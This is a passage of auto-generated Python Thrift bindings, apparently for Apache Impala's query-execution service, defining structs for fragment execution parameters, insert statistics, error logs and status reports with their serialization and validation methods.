per_fragment_instance_idx is unset!') if self.per_node_scan_ranges is None: raise TProtocol.TProtocolException(message='Required field per_node_scan_ranges is unset!') if self.per_exch_num_senders is None: raise TProtocol.TProtocolException(message='Required field per_exch_num_senders is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TExecQueryFInstancesParams: """ Attributes: - protocol_version - coord_state_idx - query_ctx - fragment_ctxs - fragment_instance_ctxs - min_reservation_bytes - initial_reservation_total_claims """ thrift_spec = ( None, # 0 (1, TType.I32, 'protocol_version', None, None, ), # 1 (2, TType.I32, 'coord_state_idx', None, None, ), # 2 (3, TType.STRUCT, 'query_ctx', (TQueryCtx, TQueryCtx.thrift_spec), None, ), # 3 (4, TType.LIST, 'fragment_ctxs', (TType.STRUCT,(TPlanFragmentCtx, TPlanFragmentCtx.thrift_spec)), None, ), # 4 (5, TType.LIST, 'fragment_instance_ctxs', (TType.STRUCT,(TPlanFragmentInstanceCtx, TPlanFragmentInstanceCtx.thrift_spec)), None, ), # 5 (6, TType.I64, 'min_reservation_bytes', None, None, ), # 6 (7, TType.I64, 'initial_reservation_total_claims', None, None, ), # 7 ) def __init__(self, protocol_version=None, coord_state_idx=None, query_ctx=None, fragment_ctxs=None, fragment_instance_ctxs=None, min_reservation_bytes=None, initial_reservation_total_claims=None,): self.protocol_version = protocol_version self.coord_state_idx = coord_state_idx self.query_ctx = query_ctx self.fragment_ctxs = fragment_ctxs self.fragment_instance_ctxs = fragment_instance_ctxs self.min_reservation_bytes = min_reservation_bytes self.initial_reservation_total_claims = initial_reservation_total_claims def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.protocol_version = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.coord_state_idx = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.query_ctx = TQueryCtx() self.query_ctx.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.LIST: self.fragment_ctxs = [] (_etype56, _size53) = iprot.readListBegin() for _i57 in xrange(_size53): _elem58 = TPlanFragmentCtx() _elem58.read(iprot) self.fragment_ctxs.append(_elem58) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 5: if ftype == TType.LIST: self.fragment_instance_ctxs = [] (_etype62, _size59) = iprot.readListBegin() for _i63 in xrange(_size59): _elem64 = TPlanFragmentInstanceCtx() _elem64.read(iprot) self.fragment_instance_ctxs.append(_elem64) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 6: if ftype == TType.I64: self.min_reservation_bytes = iprot.readI64(); else: iprot.skip(ftype) elif fid == 7: if ftype == TType.I64: self.initial_reservation_total_claims = iprot.readI64(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TExecQueryFInstancesParams') if self.protocol_version is not None: oprot.writeFieldBegin('protocol_version', TType.I32, 1) oprot.writeI32(self.protocol_version) oprot.writeFieldEnd() if self.coord_state_idx is not None: oprot.writeFieldBegin('coord_state_idx', TType.I32, 2) oprot.writeI32(self.coord_state_idx) oprot.writeFieldEnd() if self.query_ctx is not None: oprot.writeFieldBegin('query_ctx', TType.STRUCT, 3) self.query_ctx.write(oprot) oprot.writeFieldEnd() if self.fragment_ctxs is not None: oprot.writeFieldBegin('fragment_ctxs', TType.LIST, 4) oprot.writeListBegin(TType.STRUCT, len(self.fragment_ctxs)) for iter65 in self.fragment_ctxs: iter65.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.fragment_instance_ctxs is not None: oprot.writeFieldBegin('fragment_instance_ctxs', TType.LIST, 5) oprot.writeListBegin(TType.STRUCT, len(self.fragment_instance_ctxs)) for iter66 in self.fragment_instance_ctxs: iter66.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.min_reservation_bytes is not None: oprot.writeFieldBegin('min_reservation_bytes', TType.I64, 6) oprot.writeI64(self.min_reservation_bytes) oprot.writeFieldEnd() if self.initial_reservation_total_claims is not None: oprot.writeFieldBegin('initial_reservation_total_claims', TType.I64, 7) oprot.writeI64(self.initial_reservation_total_claims) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.protocol_version is None: raise TProtocol.TProtocolException(message='Required field protocol_version is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TExecQueryFInstancesResult: """ Attributes: - status """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 1 ) def __init__(self, status=None,): self.status = status def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.status = Status.ttypes.TStatus() self.status.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TExecQueryFInstancesResult') if self.status is not None: oprot.writeFieldBegin('status', TType.STRUCT, 1) self.status.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TParquetInsertStats: """ Attributes: - per_column_size """ thrift_spec = ( None, # 0 (1, TType.MAP, 'per_column_size', (TType.STRING,None,TType.I64,None), None, ), # 1 ) def __init__(self, per_column_size=None,): self.per_column_size = per_column_size def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.MAP: self.per_column_size = {} (_ktype68, _vtype69, _size67 ) = iprot.readMapBegin() for _i71 in xrange(_size67): _key72 = iprot.readString(); _val73 = iprot.readI64(); self.per_column_size[_key72] = _val73 iprot.readMapEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TParquetInsertStats') if self.per_column_size is not None: oprot.writeFieldBegin('per_column_size', TType.MAP, 1) oprot.writeMapBegin(TType.STRING, TType.I64, len(self.per_column_size)) for kiter74,viter75 in self.per_column_size.items(): oprot.writeString(kiter74) oprot.writeI64(viter75) oprot.writeMapEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.per_column_size is None: raise TProtocol.TProtocolException(message='Required field per_column_size is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TKuduDmlStats: """ Attributes: - num_row_errors """ thrift_spec = ( None, # 0 (1, TType.I64, 'num_row_errors', None, None, ), # 1 ) def __init__(self, num_row_errors=None,): self.num_row_errors = num_row_errors def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I64: self.num_row_errors = iprot.readI64(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TKuduDmlStats') if self.num_row_errors is not None: oprot.writeFieldBegin('num_row_errors', TType.I64, 1) oprot.writeI64(self.num_row_errors) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TInsertStats: """ Attributes: - bytes_written - parquet_stats - kudu_stats """ thrift_spec = ( None, # 0 (1, TType.I64, 'bytes_written', None, None, ), # 1 (2, TType.STRUCT, 'parquet_stats', (TParquetInsertStats, TParquetInsertStats.thrift_spec), None, ), # 2 (3, TType.STRUCT, 'kudu_stats', (TKuduDmlStats, TKuduDmlStats.thrift_spec), None, ), # 3 ) def __init__(self, bytes_written=None, parquet_stats=None, kudu_stats=None,): self.bytes_written = bytes_written self.parquet_stats = parquet_stats self.kudu_stats = kudu_stats def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I64: self.bytes_written = iprot.readI64(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.parquet_stats = TParquetInsertStats() self.parquet_stats.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.kudu_stats = TKuduDmlStats() self.kudu_stats.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TInsertStats') if self.bytes_written is not None: oprot.writeFieldBegin('bytes_written', TType.I64, 1) oprot.writeI64(self.bytes_written) oprot.writeFieldEnd() if self.parquet_stats is not None: oprot.writeFieldBegin('parquet_stats', TType.STRUCT, 2) self.parquet_stats.write(oprot) oprot.writeFieldEnd() if self.kudu_stats is not None: oprot.writeFieldBegin('kudu_stats', TType.STRUCT, 3) self.kudu_stats.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.bytes_written is None: raise TProtocol.TProtocolException(message='Required field bytes_written is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TInsertPartitionStatus: """ Attributes: - id - num_modified_rows - stats - partition_base_dir - kudu_latest_observed_ts """ thrift_spec = ( None, # 0 (1, TType.I64, 'id', None, None, ), # 1 (2, TType.I64, 'num_modified_rows', None, None, ), # 2 (3, TType.STRUCT, 'stats', (TInsertStats, TInsertStats.thrift_spec), None, ), # 3 (4, TType.STRING, 'partition_base_dir', None, None, ), # 4 (5, TType.I64, 'kudu_latest_observed_ts', None, None, ), # 5 ) def __init__(self, id=None, num_modified_rows=None, stats=None, partition_base_dir=None, kudu_latest_observed_ts=None,): self.id = id self.num_modified_rows = num_modified_rows self.stats = stats self.partition_base_dir = partition_base_dir self.kudu_latest_observed_ts = kudu_latest_observed_ts def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I64: self.id = iprot.readI64(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I64: self.num_modified_rows = iprot.readI64(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.stats = TInsertStats() self.stats.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRING: self.partition_base_dir = iprot.readString(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.I64: self.kudu_latest_observed_ts = iprot.readI64(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TInsertPartitionStatus') if self.id is not None: oprot.writeFieldBegin('id', TType.I64, 1) oprot.writeI64(self.id) oprot.writeFieldEnd() if self.num_modified_rows is not None: oprot.writeFieldBegin('num_modified_rows', TType.I64, 2) oprot.writeI64(self.num_modified_rows) oprot.writeFieldEnd() if self.stats is not None: oprot.writeFieldBegin('stats', TType.STRUCT, 3) self.stats.write(oprot) oprot.writeFieldEnd() if self.partition_base_dir is not None: oprot.writeFieldBegin('partition_base_dir', TType.STRING, 4) oprot.writeString(self.partition_base_dir) oprot.writeFieldEnd() if self.kudu_latest_observed_ts is not None: oprot.writeFieldBegin('kudu_latest_observed_ts', TType.I64, 5) oprot.writeI64(self.kudu_latest_observed_ts) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.partition_base_dir is None: raise TProtocol.TProtocolException(message='Required field partition_base_dir is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TInsertExecStatus: """ Attributes: - files_to_move - per_partition_status """ thrift_spec = ( None, # 0 (1, TType.MAP, 'files_to_move', (TType.STRING,None,TType.STRING,None), None, ), # 1 (2, TType.MAP, 'per_partition_status', (TType.STRING,None,TType.STRUCT,(TInsertPartitionStatus, TInsertPartitionStatus.thrift_spec)), None, ), # 2 ) def __init__(self, files_to_move=None, per_partition_status=None,): self.files_to_move = files_to_move self.per_partition_status = per_partition_status def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.MAP: self.files_to_move = {} (_ktype77, _vtype78, _size76 ) = iprot.readMapBegin() for _i80 in xrange(_size76): _key81 = iprot.readString(); _val82 = iprot.readString(); self.files_to_move[_key81] = _val82 iprot.readMapEnd() else: iprot.skip(ftype) elif fid == 2: if ftype == TType.MAP: self.per_partition_status = {} (_ktype84, _vtype85, _size83 ) = iprot.readMapBegin() for _i87 in xrange(_size83): _key88 = iprot.readString(); _val89 = TInsertPartitionStatus() _val89.read(iprot) self.per_partition_status[_key88] = _val89 iprot.readMapEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TInsertExecStatus') if self.files_to_move is not None: oprot.writeFieldBegin('files_to_move', TType.MAP, 1) oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.files_to_move)) for kiter90,viter91 in self.files_to_move.items(): oprot.writeString(kiter90) oprot.writeString(viter91) oprot.writeMapEnd() oprot.writeFieldEnd() if self.per_partition_status is not None: oprot.writeFieldBegin('per_partition_status', TType.MAP, 2) oprot.writeMapBegin(TType.STRING, TType.STRUCT, len(self.per_partition_status)) for kiter92,viter93 in self.per_partition_status.items(): oprot.writeString(kiter92) viter93.write(oprot) oprot.writeMapEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.files_to_move is None: raise TProtocol.TProtocolException(message='Required field files_to_move is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TErrorLogEntry: """ Attributes: - count - messages """ thrift_spec = ( None, # 0 (1, TType.I32, 'count', None, 0, ), # 1 (2, TType.LIST, 'messages', (TType.STRING,None), None, ), # 2 ) def __init__(self, count=thrift_spec[1][4], messages=None,): self.count = count self.messages = messages def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.count = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.LIST: self.messages = [] (_etype97, _size94) = iprot.readListBegin() for _i98 in xrange(_size94): _elem99 = iprot.readString(); self.messages.append(_elem99) iprot.readListEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TErrorLogEntry') if self.count is not None: oprot.writeFieldBegin('count', TType.I32, 1) oprot.writeI32(self.count) oprot.writeFieldEnd() if self.messages is not None: oprot.writeFieldBegin('messages', TType.LIST, 2) oprot.writeListBegin(TType.STRING, len(self.messages)) for iter100 in self.messages: oprot.writeString(iter100) oprot.writeListEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TFragmentInstanceExecStatus: """ Attributes: - fragment_instance_id - status - done - profile """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'fragment_instance_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 2 (3, TType.BOOL, 'done', None, None, ), # 3 (4, TType.STRUCT, 'profile', (RuntimeProfile.ttypes.TRuntimeProfileTree, RuntimeProfile.ttypes.TRuntimeProfileTree.thrift_spec), None, ), # 4 ) def __init__(self, fragment_instance_id=None, status=None, done=None, profile=None,): self.fragment_instance_id = fragment_instance_id self.status = status self.done = done self.profile = profile def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.fragment_instance_id = Types.ttypes.TUniqueId() self.fragment_instance_id.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.status = Status.ttypes.TStatus() self.status.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.BOOL: self.done = iprot.readBool(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.profile = RuntimeProfile.ttypes.TRuntimeProfileTree() self.profile.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TFragmentInstanceExecStatus') if self.fragment_instance_id is not None: oprot.writeFieldBegin('fragment_instance_id', TType.STRUCT, 1) self.fragment_instance_id.write(oprot) oprot.writeFieldEnd() if self.status is not None: oprot.writeFieldBegin('status', TType.STRUCT, 2) self.status.write(oprot) oprot.writeFieldEnd() if self.done is not None: oprot.writeFieldBegin('done', TType.BOOL, 3) oprot.writeBool(self.done) oprot.writeFieldEnd() if self.profile is not None: oprot.writeFieldBegin('profile', TType.STRUCT, 4) self.profile.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TReportExecStatusParams: """ Attributes: - protocol_version - query_id - coord_state_idx - instance_exec_status - insert_exec_status - error_log - status """ thrift_spec = ( None, # 0 (1, TType.I32, 'protocol_version', None, None, ), # 1 (2, TType.STRUCT, 'query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2 (3, TType.I32, 'coord_state_idx', None, None, ), # 3 (4, TType.LIST, 'instance_exec_status', (TType.STRUCT,(TFragmentInstanceExecStatus, TFragmentInstanceExecStatus.thrift_spec)), None, ), # 4 (5, TType.STRUCT, 'insert_exec_status', (TInsertExecStatus, TInsertExecStatus.thrift_spec), None, ), # 5 (6, TType.MAP, 'error_log', (TType.I32,None,TType.STRUCT,(TErrorLogEntry, TErrorLogEntry.thrift_spec)), None, ), # 6 (7, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 7 ) def __init__(self, protocol_version=None, query_id=None, coord_state_idx=None, instance_exec_status=None, insert_exec_status=None, error_log=None, status=None,): self.protocol_version = protocol_version self.query_id = query_id self.coord_state_idx = coord_state_idx self.instance_exec_status = instance_exec_status self.insert_exec_status = insert_exec_status self.error_log = error_log self.status = status def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.protocol_version = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.query_id = Types.ttypes.TUniqueId() self.query_id.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.I32: self.coord_state_idx = iprot.readI32(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.LIST: self.instance_exec_status = [] (_etype104, _size101) = iprot.readListBegin() for _i105 in xrange(_size101): _elem106 = TFragmentInstanceExecStatus() _elem106.read(iprot) self.instance_exec_status.append(_elem106) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRUCT: self.insert_exec_status = TInsertExecStatus() self.insert_exec_status.read(iprot) else: iprot.skip(ftype) elif fid == 6: if ftype == TType.MAP: self.error_log = {} (_ktype108, _vtype109, _size107 ) = iprot.readMapBegin() for _i111 in xrange(_size107): _key112 = iprot.readI32(); _val113 = TErrorLogEntry() _val113.read(iprot) self.error_log[_key112] = _val113 iprot.readMapEnd() else: iprot.skip(ftype) elif fid == 7: if ftype == TType.STRUCT: self.status = Status.ttypes.TStatus() self.status.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TReportExecStatusParams') if self.protocol_version is not None: oprot.writeFieldBegin('protocol_version', TType.I32, 1) oprot.writeI32(self.protocol_version) oprot.writeFieldEnd() if self.query_id is not None: oprot.writeFieldBegin('query_id', TType.STRUCT, 2) self.query_id.write(oprot) oprot.writeFieldEnd() if self.coord_state_idx is not None: oprot.writeFieldBegin('coord_state_idx', TType.I32, 3) oprot.writeI32(self.coord_state_idx) oprot.writeFieldEnd() if self.instance_exec_status is not None: oprot.writeFieldBegin('instance_exec_status', TType.LIST, 4) oprot.writeListBegin(TType.STRUCT, len(self.instance_exec_status)) for iter114 in self.instance_exec_status: iter114.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.insert_exec_status is not None: oprot.writeFieldBegin('insert_exec_status', TType.STRUCT, 5) self.insert_exec_status.write(oprot) oprot.writeFieldEnd() if self.error_log is not None: oprot.writeFieldBegin('error_log', TType.MAP, 6) oprot.writeMapBegin(TType.I32, TType.STRUCT, len(self.error_log)) for kiter115,viter116 in self.error_log.items(): oprot.writeI32(kiter115) viter116.write(oprot) oprot.writeMapEnd() oprot.writeFieldEnd() if self.status is not None: oprot.writeFieldBegin('status', TType.STRUCT, 7) self.status.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.protocol_version is None: raise TProtocol.TProtocolException(message='Required field protocol_version is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TReportExecStatusResult: """ Attributes: - status """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 1 ) def __init__(self, status=None,): self.status = status def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.status = Status.ttypes.TStatus() self.status.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TReportExecStatusResult') if self.status is not None: oprot.writeFieldBegin('status', TType.STRUCT, 1) self.status.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TCancelQueryFInstancesParams: """ Attributes: - protocol_version - query_id """ thrift_spec = ( None, # 0 (1, TType.I32, 'protocol_version', None, None, ), # 1 (2, TType.STRUCT, 'query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2 ) def __init__(self, protocol_version=None, query_id=None,): self.protocol_version = protocol_version self.query_id = query_id def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) 